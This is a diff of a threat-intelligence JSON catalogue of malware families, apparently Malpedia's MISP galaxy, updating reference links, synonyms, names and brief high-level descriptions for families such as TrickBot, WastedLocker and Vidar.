"https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", - "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/", + "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html", "http://www.malware-traffic-analysis.net/2018/02/01/", "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/", @@ -30883,7 +35199,10 @@ "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", + "https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/", + "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/", "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", @@ -30891,7 +35210,7 @@ "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/", "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/", - "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", + "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", @@ -30901,30 +35220,37 @@ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/", "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/", "https://www.secureworks.com/research/threat-profiles/gold-ulrick", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://twitter.com/VK_Intel/status/1328578336021483522", "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis", "https://duo.com/decipher/trickbot-up-to-its-old-tricks", "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/", - "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/", "https://www.youtube.com/watch?v=EdchPEHnohw", + "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", "https://redcanary.com/resources/webinars/deep-dive-process-injection/", "https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/", "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/", - "https://osint.fans/service-nsw-russia-association" + "https://osint.fans/service-nsw-russia-association", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/" ], "synonyms": [ "TheTrick", @@ -30941,18 +35267,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", "https://www.eenews.net/stories/1060123327/", "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", "https://home.treasury.gov/news/press-releases/sm1162", - "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", - "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", + "https://dragos.com/blog/trisis/TRISIS-01.pdf", + "https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF", "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf", + "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://dragos.com/blog/trisis/TRISIS-01.pdf", - "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security" + "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", + "https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf" ], "synonyms": [ "HatMan", @@ -31086,6 +35414,8 @@ "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity" ], "synonyms": [ + "BigBoss", + "Cacao", "GoldenSky", "HyperStack" ], @@ -31535,23 +35865,9 @@ "synonyms": [], "type": [] }, - "uuid": "498a794c-64f9-4337-ac71-a3ff3cb53c68", + "uuid": "45d78ad1-6b31-423d-8c90-9bea0934c218", "value": "win.unidentified_059" }, - { - "description": "Unidentified sideloader used by EmissaryPanda", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_060", - "https://norfolkinfosec.com/emissary-panda-dll-backdoor/", - "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "84f43641-77bc-4dcb-a104-150e8574da22", - "value": "Unidentified 060" - }, { "description": "Was previously wrongly tagged as PoweliksDropper, now looking for additional context.", "meta": { @@ -31748,6 +36064,72 @@ "uuid": "99099489-eeb9-415a-a3b8-6133e774bed0", "value": "Unidentified 078 (Zebrocy Nim Loader?)" }, + { + "description": "This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. \r\nIt is also used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080", + "https://securelist.com/luckymouse-ndisproxy-driver/87914/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f12b3029-87a1-4632-855f-4fef784210bd", + "value": "Unidentified 080" + }, + { + "description": "Kaspersky Labs observed Andariel to drop this ransomware in one case within a series of attacks carried out against targets in South Korea in April 2021.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_081", + "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2eb8ca65-186b-44ae-bd91-189b3eb5ed54", + "value": "Unidentified 081 (Andariel Ransomware)" + }, + { + "description": "This is third stage backdoor mentioned in the Kaspersky blog, \"Andariel evolves to target South Korea with ransomware\". The third stage payload was created via the second stage payload, is interactively executed in the operation and exists in both x64 and x86 versions. Most of them use Internet Explorer or Google Chrome icons and corresponding file names to disguise themselves as legitimate internet browsers. The malware decrypts the embedded payload at runtime. It uses an embedded 16-byte XOR key to decrypt the base64 encoded payload. The decrypted payload is another portable executable file that runs in memory. Before getting decrypted with a hardcoded XOR key, the backdoor also checks for sandbox environment.\r\nThe backdoor has some code overlap with a know malware family PEBBLEDASH, attributed to Lazarus/LABYRINTH CHOLLIMA.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_082", + "https://www.brighttalk.com/webcast/18282/493986", + "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "082d2e86-d320-43cf-a602-f7bee7e3f3d4", + "value": "Unidentified 082" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083", + "https://www.intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "438ab9a3-3e2b-4241-8bcb-e61c2d118772", + "value": "Unidentified 083 (AutoIT Stealer)" + }, + { + "description": "A RAT written in .NET, potentially used by Transparent Tribe.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_085", + "https://blog.cyble.com/2021/09/14/apt-group-targets-indian-defense-officials-through-enhanced-ttps/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f80e8948-8e1e-4ecf-8d5e-08148e4dd2b0", + "value": "Unidentified 085" + }, { "description": "", "meta": { @@ -31811,12 +36193,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware", "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/", - "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", + "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0", "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA", + "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", @@ -31844,6 +36229,7 @@ "https://www.circl.lu/pub/tr-25/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots", "https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg", @@ -31890,6 +36276,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist", + "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf", "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/" ], "synonyms": [], @@ -31916,6 +36303,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.valuevault", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html", "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/" ], @@ -31957,12 +36345,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", + "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/", "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://www.secureworks.com/research/dyre-banking-trojan" ], "synonyms": [ "Catch", @@ -32004,7 +36396,7 @@ "type": [] }, "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", - "value": "Velso Ransomware" + "value": "Velso" }, { "description": "", @@ -32048,6 +36440,19 @@ "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", "value": "Venus Locker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermilion_strike", + "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f2db1f70-a284-42c1-9f5a-4b2f46dc8868", + "value": "Vermilion Strike (Windows)" + }, { "description": "", "meta": { @@ -32083,7 +36488,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", - "https://twitter.com/GrujaRS/status/1241657443282825217" + "https://twitter.com/GrujaRS/status/1241657443282825217", + "https://seguranca-informatica.pt/secrets-behind-the-lazaruss-vhd-ransomware/" ], "synonyms": [], "type": [] @@ -32096,11 +36502,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar", + "https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed", "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://twitter.com/sisoma2/status/1409816282065743872", + "https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk", + "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html", + "https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal", + "https://asec.ahnlab.com/en/22932/", "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/" ], "synonyms": [], @@ -32109,6 +36521,25 @@ "uuid": "1f44c08a-b427-4496-9d6d-909b6bf34b9b", "value": "vidar" }, + { + "description": "Wiper malware discovered by Japanese security firm Mitsui Bussan Secure Directions (MBSD), which is assumed to target Japan, the host country of the 2021 Summer Olympics. In addition to targeting common file Office-related files, it specifically targets file types associated with the Japanese word processor Ichitaro.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner", + "https://www.mbsd.jp/research/20210721/blog/", + "https://blog.trendmicro.co.jp/archives/28319", + "https://therecord.media/wiper-malware-targeting-japanese-pcs-discovered-ahead-of-tokyo-olympics-opening/", + "https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/", + "https://www.fortinet.com/blog/threat-research/wiper-malware-riding-tokyo-olympic-games" + ], + "synonyms": [ + "VIGILANT CHECKER" + ], + "type": [] + }, + "uuid": "65711172-14f7-4e3d-9aca-7895b37b2e9a", + "value": "VIGILANT CLEANER" + }, { "description": "", "meta": { @@ -32154,6 +36585,20 @@ "uuid": "a49d6db9-32a0-42a8-acb9-174146a7fafa", "value": "Vizom" }, + { + "description": "VJW0rm (aka Vengeance Justice Worm) is a publicly available, modular JavaScript RAT. Vjw0rm was first released in November 2016 by its primary author, v_B01 (aka Sliemerez), within the prominent DevPoint Arabic-language malware development community. VJW0rm appears to be the JavaScript variant of a series of RATs with identical functionality released by the author throughout late 2016. Other variants include a Visual Basic Script (VBS) based worm titled vw0rm (Vengeance Worm), an AutoHotkey-based tool called vrw0rm (Vengeance Rise Worm), and a PowerShell-based variant called vdw0rm (Vengeance Depth Worm).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm", + "https://bazaar.abuse.ch/browse/signature/Vjw0rm/", + "https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3a8186f1-ff2a-4431-be99-7e31c0096f15", + "value": "Vjw0rm" + }, { "description": "", "meta": { @@ -32190,19 +36635,20 @@ "value": "Vobfus" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.void", - "https://id-ransomware.blogspot.com/2020/04/void-voidcrypt-ransomware.html" + "https://id-ransomware.blogspot.com/2020/04/void-voidcrypt-ransomware.html", + "https://securelist.com/cis-ransomware/104452/" ], "synonyms": [ - "VoidCrypt Ransomware" + "VoidCrypt" ], "type": [] }, "uuid": "55f66b60-5284-4db6-b26e-52b3aea17641", - "value": "Void Ransomware" + "value": "Void" }, { "description": "", @@ -32271,6 +36717,19 @@ "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8", "value": "vSkimmer" }, + { + "description": "Information stealer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vulturi", + "https://twitter.com/ViriBack/status/1430604948241276928?s=20" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cfbd52a9-39d6-46f4-a539-76abcec92088", + "value": "Vulturi" + }, { "description": "", "meta": { @@ -32334,7 +36793,10 @@ "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf", "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", + "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/", + "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf", "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", @@ -32355,7 +36817,7 @@ "value": "WannaCryptor" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannaren", @@ -32365,31 +36827,47 @@ "type": [] }, "uuid": "44f548e2-9a47-433a-bccf-fff412d2963b", - "value": "WannaRen Ransomware" + "value": "WannaRen" }, { "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker", - "https://securelist.com/wastedlocker-technical-analysis/97944/", + "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://ioc.hatenablog.com/entry/2020/08/16/132853", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf", + "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html", + "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://unit42.paloaltonetworks.com/wastedlocker/", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf", "https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us", - "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US", "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html", - "https://www.bbc.com/news/world-us-canada-53195749", - "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/", - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf", + "https://www.bleepingcomputer.com/news/security/insurance-giant-cna-hit-by-new-phoenix-cryptolocker-ransomware/", + "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/", + "https://securelist.com/wastedlocker-technical-analysis/97944/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us", + "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US", "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf", + "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf", + "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.bbc.com/news/world-us-canada-53195749", + "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/" ], "synonyms": [], "type": [] @@ -32397,6 +36875,28 @@ "uuid": "e72a0bde-ea5b-4450-bc90-b5d2dca697b4", "value": "WastedLocker" }, + { + "description": "Waterbear, also known as DbgPrint in its earlier export function, has been active since 2009. The malware is presumably developed by the BlackTech APT group and adopts advanced anti-analysis and forward-thinking design. These designs include a sophisticated shellcode stager, the ability to load plugins on-the-fly, and overall evasiveness should the C2 server fail to respond with a valid session key.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterbear", + "https://www.youtube.com/watch?v=6SDdUVejR2w", + "https://www.zdnet.com/article/waterbear-malware-used-in-attack-wave-against-government-agencies/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf", + "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", + "https://daydaynews.cc/zh-tw/technology/297265.html", + "https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf" + ], + "synonyms": [ + "DbgPrint", + "EYEWELL" + ], + "type": [] + }, + "uuid": "042ddeed-78e4-4799-965a-3b6815145f28", + "value": "Waterbear" + }, { "description": "", "meta": { @@ -32611,23 +37111,40 @@ "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", "value": "WebMonitor RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wecontrol", + "https://unit42.paloaltonetworks.com/westeal/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "541720a8-a125-4277-b109-c04e475c4cc3", + "value": "WeControl" + }, { "description": "WellMess is A Remote Access Trojan written in GoLang and .NET. It has hard-coded User-Agents. Attackers deploy WellMess using separate tools which also allow lateral movement, for example \"gost\". Command and Control traffic is handled via HTTP using the Set-Cookie field and message body.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", + "https://us-cert.cisa.gov/ncas/alerts/aa21-116a", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", - "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", + "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html", "https://securelist.com/apt-trends-report-q2-2020/97937/", + 